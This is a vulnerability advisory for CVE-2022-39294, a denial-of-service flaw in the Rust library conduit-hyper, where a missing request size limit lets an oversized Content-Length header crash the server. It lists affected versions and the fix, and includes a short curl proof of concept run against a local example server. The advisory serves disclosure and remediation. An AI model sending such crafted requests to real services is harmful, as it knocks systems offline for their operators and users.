| description | title | date_published | last_updated | xray_id | vul_id | cvss | severity | discovered_by | type |
|---|---|---|---|---|---|---|---|---|---|
CVE-2022-39294 High severity. Missing limit checks in conduit-hyper leads to denial of service |
conduit-hyper missing request size limit DoS |
2022-11-01 |
2022-11-01 |
CVE-2022-39294 |
7.5 |
high |
Ori Hollander |
vulnerability |
A missing request size limit for HTTP requests in conduit-hyper can allow network attackers to perform denial of service
[0.2.0-alpha.3, 0.4.2), fixed in 0.4.2
conduit-hyper would not, by default, set a limit for the size of the request body. That meant if a malicious peer would send a request with a very large Content-Length header (even if the body itself is not very large), the Rust allocator would panic (due to a failed allocation) and the process would crash.
git clone https://github.com/conduit-rust/conduit-hyper
cd conduit-hyper && cargo run --example server
curl -v -X PUT "http://127.0.0.1:12345/" --data `python3 -c
"import sys; sys.stdout.write('a'*10000)"` -H
"Content-Length: 11111111111111111111"No mitigations are provided for this vulnerability.
In order to fully fix this vulnerability, we recommend upgrading conduit-hyper to version 0.4.2